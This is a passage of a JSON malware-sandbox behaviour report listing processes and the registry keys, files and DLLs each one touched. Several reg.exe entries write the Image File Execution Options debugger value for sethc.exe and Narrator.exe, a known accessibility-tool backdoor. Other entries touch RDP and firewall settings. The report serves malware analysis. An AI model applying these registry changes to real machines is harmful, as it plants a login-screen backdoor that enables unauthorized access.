"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\system\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\MaxIdleTime",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\MaxIdleTime"
]
},
"first_seen": 1574704401.906124,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\System32\\lsass.exe",
"process_name": "lsass.exe",
"pid": 476,
"summary": {},
"first_seen": 1574704385.34375,
"ppid": 376
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 2516,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\debugger",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\debugger"
]
},
"first_seen": 1574704387.546751,
"ppid": 2988
},
{
"process_path": "C:\\Windows\\SysWOW64\\cmd.exe",
"process_name": "cmd.exe",
"pid": 3464,
"summary": {
"file_exists": [
"C:\\Users\\cuck\\AppData\\Local\\Temp"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Command Processor"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DefaultColor",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\AutoRun",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DelayedExpansion",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DisableUNCCheck",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\EnableExtensions",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\CompletionChar",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\EnableExtensions",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\PathCompletionChar",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\PathCompletionChar",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DisableUNCCheck",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DelayedExpansion",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\AutoRun",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DefaultColor",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\CompletionChar"
],
"directory_enumerated": [
"C:\\Users\\cuck\\AppData\\Local\\Temp",
"C:\\Users\\cuck",
"C:\\Users\\cuck\\AppData",
"C:\\Users\\cuck\\AppData\\Local",
"C:\\Users"
]
},
"first_seen": 1574704389.343626,
"ppid": 2988
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 2356,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\debugger",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\debugger"
]
},
"first_seen": 1574704388.093626,
"ppid": 2988
},
{
"process_path": "C:\\Windows\\SysWOW64\\cmd.exe",
"process_name": "cmd.exe",
"pid": 3388,
"summary": {
"file_exists": [
"C:\\Users\\cuck\\AppData\\Local\\Temp"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Command Processor"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DefaultColor",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\AutoRun",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DelayedExpansion",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DisableUNCCheck",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\EnableExtensions",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\CompletionChar",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\EnableExtensions",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\PathCompletionChar",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\PathCompletionChar",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DisableUNCCheck",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DelayedExpansion",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\AutoRun",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DefaultColor",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\CompletionChar"
],
"directory_enumerated": [
"C:\\Users\\cuck\\AppData\\Local\\Temp",
"C:\\Users\\cuck",
"C:\\Users\\cuck\\AppData",
"C:\\Users\\cuck\\AppData\\Local",
"C:\\Users"
]
},
"first_seen": 1574704389.312374,
"ppid": 2988
},
{
"process_path": "C:\\Windows\\SysWOW64\\cmd.exe",
"process_name": "cmd.exe",
"pid": 3296,
"summary": {
"file_exists": [
"C:\\Users\\cuck\\AppData\\Local\\Temp"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Command Processor"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DefaultColor",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\AutoRun",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DelayedExpansion",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DisableUNCCheck",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\EnableExtensions",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\CompletionChar",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\EnableExtensions",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\PathCompletionChar",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\PathCompletionChar",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DisableUNCCheck",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DelayedExpansion",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\AutoRun",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DefaultColor",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\CompletionChar"
],
"directory_enumerated": [
"C:\\Users\\cuck\\AppData\\Local\\Temp",
"C:\\Users\\cuck",
"C:\\Users\\cuck\\AppData",
"C:\\Users\\cuck\\AppData\\Local",
"C:\\Users"
]
},
"first_seen": 1574704389.109249,
"ppid": 2988
},
{
"process_path": "C:\\Windows\\SysWOW64\\netsh.exe",
"process_name": "netsh.exe",
"pid": 3908,
"summary": {
"file_recreated": [
"\\Device\\Http\\Communication",
"\\Device\\KsecDD"
],
"regkey_written": [
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\LanguageList"
],
"dll_loaded": [
"RASMONTR.DLL",
"WSHELPER.DLL",
"RpcRtRemote.dll",
"kernel32.dll",
"NSHIPSEC.DLL",
"HTTPAPI.dll",
"API-MS-WIN-Service-Management-L2-1-0.dll",
"HNETMON.DLL",
"API-MS-WIN-Service-Management-L1-1-0.dll",
"C:\\Windows\\SysWOW64\\bcryptprimitives.dll",
"API-MS-Win-Core-LocalRegistry-L1-1-0.dll",
"IFMON.DLL",
"RPCNSH.DLL",
"ole32.dll",
"CRYPTSP.dll",
"USER32.dll",
"NETIOHLP.DLL",
"API-MS-WIN-Service-winsvc-L1-1-0.dll",
"ADVAPI32.dll",
"NSHWFP.DLL",
"NAPMONTR.DLL",
"NSHHTTP.DLL",
"WHHELPER.DLL",
"PEERDISTSH.DLL",
"GPAPI.dll",
"FWCFG.DLL",
"AUTHFWCFG.DLL",
"P2PNETSH.DLL",
"DOT3CFG.DLL",
"WLANCFG.DLL",
"DHCPCMONITOR.DLL",
"userenv.dll"
],
"file_opened": [
"C:\\Windows\\System32\\FirewallAPI.dll"
],
"regkey_opened": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Strong Cryptographic Provider",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base DSS and Diffie-Hellman Cryptographic Provider",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\CacheMgr\\Republication",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.44.3.4!7",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider",
"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\PeerDist",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Rpc\\Extensions",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\HostedCache",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\BFE",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\Connection",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\PolicyProvider",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\Publisher",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Qecs\\79621",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Qecs\\79623",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Enroll\\HcsGroups\\(Default)",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\DownloadManager\\Discovery",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\DiscoveryManager",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion",
"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\iphlpsvc\\Config",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.47.1.1!7",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\(Default)",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip6\\Parameters",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\Protocol",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\HostedCache\\Connection",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HandleMgr",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base Cryptographic Provider v1.0",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Publisher",
"HKEY_CURRENT_USER\\Interface\\{00000134-0000-0000-C000-000000000046}",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\SecurityManager",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\DownloadManager\\Upload",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base DSS Cryptographic Provider",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7",
"HKEY_LOCAL_MACHINE\\System\\Setup",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft RSA SChannel Cryptographic Provider",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\Roaming",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DiscoveryManager",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\UI",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Service",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\Peers\\Connection",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Qecs\\79619",
"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\NapAgent\\LocalConfig",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Qecs\\79617",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Setup",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft DH SChannel Cryptographic Provider",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\DownloadManager\\Protocol",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced Cryptographic Provider v1.0",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\DownloadManager\\Peers\\Connection",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\CooperativeCaching",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\DownloadManager\\Download",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.47.1.1!7",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\CacheMgr\\Publication",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\CacheMgr\\Publication",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\Interface\\{00000134-0000-0000-C000-000000000046}\\ProxyStubClsid32",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\HandleMgr",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\DownloadManager",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced RSA and AES Cryptographic Provider",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\Download",
"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\LDAP",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NetSh",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\SecurityManager\\Restricted",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Enroll\\HcsGroups",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Diagnostics",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\CooperativeCaching",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\SecurityManager",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\DownloadManager\\UtilityIndex",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\crypt32",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\CacheMgr\\Republication",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\UtilityIndex",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\Service",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Roaming",
"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\System",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\Upload",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base Smart Card Crypto Provider",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\SecurityManager\\Restricted",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.44.3.4!7",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\Discovery",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Rpc\\SecurityService"
],
"file_exists": [
"C:\\Windows\\System32\\napipsec.dll",
"C:\\Windows\\System32\\qagentrt.dll",
"C:\\Windows\\System32\\EAPQEC.DLL",
"C:\\Windows\\System32\\dnsapi.dll",
"C:\\Windows\\System32\\DHCPQEC.DLL",
"C:\\Windows\\System32\\p2pcollab.dll",
"C:\\Windows\\System32\\tsgqec.dll"
],
"mutex": [
"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7"
],
"guid": [
"{432a1da5-3888-4b9a-a734-cff1e448c5b9}",
"{00000323-0000-0000-c000-000000000046}",
"{f7898af5-cac4-4632-a2ec-da06e5111af2}",
"{00000146-0000-0000-c000-000000000046}",
"{07a1127b-18cc-422a-b988-e892600fcc74}",
"{304ce942-6e39-40d8-943a-b913c40c9cd4}",
"{ea4a0a43-1c8f-4c7b-a4b1-28ecbd96ba8c}",
"{bf0ec44a-c6ae-4bc5-a0ca-d33fa6c9c6c2}",
"{eb082ba1-df8a-46be-82f3-35bf9e9be52f}"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Service\\PolicyRefreshInProgress",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DiscoveryManager\\DiscoveryProviderDllPath",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\LDAP\\UseHostnameAsAlias",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Component Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SystemSetupInProgress",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.44.3.4!7\\Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft RSA SChannel Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Service\\Enable",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Component Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Setup\\SourcePath",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base Smart Card Crypto Provider\\Type",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-4",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-2",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-3",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-1",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Validator Clsid",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\MaxPendingOffers",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\LDAP\\UseOldHostResolutionOrder",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Config Clsid",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Version",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Enabled",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Description",
